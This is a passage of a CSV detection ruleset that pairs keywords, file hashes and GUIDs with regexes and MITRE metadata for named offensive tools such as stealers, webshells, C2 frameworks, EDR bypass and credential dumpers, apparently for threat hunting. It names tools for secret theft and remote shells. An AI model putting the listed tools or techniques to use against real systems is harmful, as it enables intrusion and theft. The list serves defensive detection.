"*fee -c */* -w 64 | *",".{0,1000}fee\s\-c\s.{0,1000}\/.{0,1000}\s\-w\s64\s\|\s.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44772"
"*fee4ce020777d27bf561a3c914619fcf77a4b7e1ec9202ad93461ced38c91c5b*",".{0,1000}fee4ce020777d27bf561a3c914619fcf77a4b7e1ec9202ad93461ced38c91c5b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44776"
"*fee8aa6d643d13d224330adb9389f37ec58c487cf91769158f5a650fa5522bde*",".{0,1000}fee8aa6d643d13d224330adb9389f37ec58c487cf91769158f5a650fa5522bde.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44777"
"*feeds.dev.pico.sh*",".{0,1000}feeds\.dev\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","44779"
"*feeds.pico.sh*",".{0,1000}feeds\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","44780"
"*fef899edefd08d58272e77a010c77e788fe5a0ea114b729908e928d07c78ae40*",".{0,1000}fef899edefd08d58272e77a010c77e788fe5a0ea114b729908e928d07c78ae40.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","44782"
"*Fentanyl strikes again!*",".{0,1000}Fentanyl\sstrikes\sagain!.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","44784"
"*Fentanyl/fenty.py*",".{0,1000}Fentanyl\/fenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","44785"
"*feroxbuster -w *fzf-wordlists* -u *",".{0,1000}feroxbuster\s\-w\s.{0,1000}fzf\-wordlists.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44786"
"*Fertiliser.exe \\*",".{0,1000}Fertiliser\.exe\s\\\\.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44787"
"*Fetch-And-Brute-Local-Accounts.ps1*",".{0,1000}Fetch\-And\-Brute\-Local\-Accounts\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","44788"
"*Fetching domain information through a Kerberos auth over LDAP*",".{0,1000}Fetching\sdomain\sinformation\sthrough\sa\sKerberos\sauth\sover\sLDAP.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","44789"
"*Fetching domain information through NTLM over LDAP*",".{0,1000}Fetching\sdomain\sinformation\sthrough\sNTLM\sover\sLDAP.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","44790"
"*ff_osx_extension-dropper*",".{0,1000}ff_osx_extension\-dropper.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44791"
"*ff0724e19316b2eff48ac37d695a0f6dcb09fa297153711c24baf16095e21f23*",".{0,1000}ff0724e19316b2eff48ac37d695a0f6dcb09fa297153711c24baf16095e21f23.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44794"
"*ff08f080b3051e1054d7ed1e463591afe187eaceccb8c91fd1fd2a15827ad99b*",".{0,1000}ff08f080b3051e1054d7ed1e463591afe187eaceccb8c91fd1fd2a15827ad99b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44795"
"*ff097fb7664b07349f132f53d87df71a68d8ab6b74af21f8a3691024f57671f8*",".{0,1000}ff097fb7664b07349f132f53d87df71a68d8ab6b74af21f8a3691024f57671f8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44796"
"*ff0e32bd9f03a7cb0e37c6bc14e5478c301e85072a21e4bacb65959c7c2c394d*",".{0,1000}ff0e32bd9f03a7cb0e37c6bc14e5478c301e85072a21e4bacb65959c7c2c394d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44797"
"*ff0f7b3bceac2a15be7b35bc7c1933b46ba6eeca6bba97dbd5227b59b913cb26*",".{0,1000}ff0f7b3bceac2a15be7b35bc7c1933b46ba6eeca6bba97dbd5227b59b913cb26.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44798"
"*FF1F2BA2086D03356EB51ED2208F334EF9E71CA266BFB73AB3CD1F14B494503E*",".{0,1000}FF1F2BA2086D03356EB51ED2208F334EF9E71CA266BFB73AB3CD1F14B494503E.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","0","#filehash","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","44800"
"*ff21d3231fe5e5c81f8640a0448236555e0730c58e4aec21c8004c6aa71e4eb4*",".{0,1000}ff21d3231fe5e5c81f8640a0448236555e0730c58e4aec21c8004c6aa71e4eb4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44801"
"*FF3347B5A5D4392C5B9D571E9A52DEEE018BEFE78D67A0F096CB995BCA7B1186*",".{0,1000}FF3347B5A5D4392C5B9D571E9A52DEEE018BEFE78D67A0F096CB995BCA7B1186.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","44802"
"*ff50ca9ef07a4989f30156b09342e2a376fb5f852799cb54d1b311645f573cc8*",".{0,1000}ff50ca9ef07a4989f30156b09342e2a376fb5f852799cb54d1b311645f573cc8.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","44806"
"*ff54582037d9e221decb7c000425ee66f79551184793fd78caa946e66d6b94f5*",".{0,1000}ff54582037d9e221decb7c000425ee66f79551184793fd78caa946e66d6b94f5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44807"
"*ff54f9ababc26c1c7acdbf9e133e48bc60860371ae8f36997d6a345a1db539e1*",".{0,1000}ff54f9ababc26c1c7acdbf9e133e48bc60860371ae8f36997d6a345a1db539e1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44808"
"*ff5a3bf00aa5f5664da20030aaafd09333f2a75830d3e7df3666d8c9fea9eaaa*",".{0,1000}ff5a3bf00aa5f5664da20030aaafd09333f2a75830d3e7df3666d8c9fea9eaaa.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","44810"
"*FF5F7C4C-6915-4C53-9DA3-B8BE6C5F1DB9*",".{0,1000}FF5F7C4C\-6915\-4C53\-9DA3\-B8BE6C5F1DB9.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#GUIDproject","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","44811"
"*ff6240c57ec7aa0a28920a304f953beec996bed301920240228e696a1810edb0*",".{0,1000}ff6240c57ec7aa0a28920a304f953beec996bed301920240228e696a1810edb0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44812"
"*ff732bedb8593016ffbe4925ce8fd87a74478b06391079413b70ee9e151826f2*",".{0,1000}ff732bedb8593016ffbe4925ce8fd87a74478b06391079413b70ee9e151826f2.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","0","#filehash","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","44817"
"*ff7a4f0dc724475fe15401ead0558667cea2b83113553486e74aacee031f17ae*",".{0,1000}ff7a4f0dc724475fe15401ead0558667cea2b83113553486e74aacee031f17ae.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44818"
"*ff7a51c653501cfce1fd9198391441d7bad21a11bd75a905479682c0a00cb846*",".{0,1000}ff7a51c653501cfce1fd9198391441d7bad21a11bd75a905479682c0a00cb846.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","44819"
"*ff7db32d94ef4b9e11ced9226a8e4a62eb0ec932e66b4655b845dd7f717bf94a*",".{0,1000}ff7db32d94ef4b9e11ced9226a8e4a62eb0ec932e66b4655b845dd7f717bf94a.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","44820"
"*ff800e89edecbd936169c78cbac4a524da8dd91c922c9909f5f6115bdc898716*",".{0,1000}ff800e89edecbd936169c78cbac4a524da8dd91c922c9909f5f6115bdc898716.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","44821"
"*ff880fa3ebb735862d21c84365bbfefcb7fa2caedf42d51f61f6fc5d6944706e*",".{0,1000}ff880fa3ebb735862d21c84365bbfefcb7fa2caedf42d51f61f6fc5d6944706e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44823"
"*ff8a3f50642a1284dd9596164e43e097ec4689e90a0f1ec65743ace87a2eba31*",".{0,1000}ff8a3f50642a1284dd9596164e43e097ec4689e90a0f1ec65743ace87a2eba31.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44824"
"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*",".{0,1000}FFA0FDDE\-BE70\-49E4\-97DE\-753304EF1113.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","#GUIDproject","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","44830"
"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*",".{0,1000}FFA0FDDE\-BE70\-49E4\-97DE\-753304EF1113.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","#GUIDproject","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","44831"
"*ffa5514b45c48061e412487d4defdeffa87a338213aa1bc4aabb3259ce18d7aa*",".{0,1000}ffa5514b45c48061e412487d4defdeffa87a338213aa1bc4aabb3259ce18d7aa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44832"
"*ffa560f9e335f64e3e5716bcf9566e2b80a9071e92f7c2da81a191026d2c3794*",".{0,1000}ffa560f9e335f64e3e5716bcf9566e2b80a9071e92f7c2da81a191026d2c3794.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","44833"
"*ffa8bb5d802f08a81815496d7991d3c3be3fd3fe15160bc85dca4cfc1bed7a03*",".{0,1000}ffa8bb5d802f08a81815496d7991d3c3be3fd3fe15160bc85dca4cfc1bed7a03.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44834"
"*ffa977849b2f8509e10dc873414ea6eba69531b901f932c8583478d215de863d*",".{0,1000}ffa977849b2f8509e10dc873414ea6eba69531b901f932c8583478d215de863d.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44836"
"*ffb3ecd39698fe5e2fc33483b159f10d1ba16801682aab754f61ccb814eff5d7*",".{0,1000}ffb3ecd39698fe5e2fc33483b159f10d1ba16801682aab754f61ccb814eff5d7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44840"
"*ffb4cbd5e7c7b0b110ea1c96ab0d961f40ebdf5adaccdf87bbd34bf75420ff1a*",".{0,1000}ffb4cbd5e7c7b0b110ea1c96ab0d961f40ebdf5adaccdf87bbd34bf75420ff1a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44841"
"*ffbdae1e47e2a86fb9791a70eb4e0840b15939f89ef7ba4bd80b6f8bf46a863e*",".{0,1000}ffbdae1e47e2a86fb9791a70eb4e0840b15939f89ef7ba4bd80b6f8bf46a863e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44843"
"*FFC64B8DA962F05C780B803F11727D9960C31E133523FE9DADA309F8836DD098*",".{0,1000}FFC64B8DA962F05C780B803F11727D9960C31E133523FE9DADA309F8836DD098.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44846"
"*ffcce186e5ba227e45785a92225b8455b29da5b85d0b030c0346923625d495dd*",".{0,1000}ffcce186e5ba227e45785a92225b8455b29da5b85d0b030c0346923625d495dd.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","44847"
"*ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b*",".{0,1000}ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b","10","10","N/A","N/A","N/A","N/A","44848"
"*ffdfgdfg/nps:latest*",".{0,1000}ffdfgdfg\/nps\:latest.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","1","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44849"
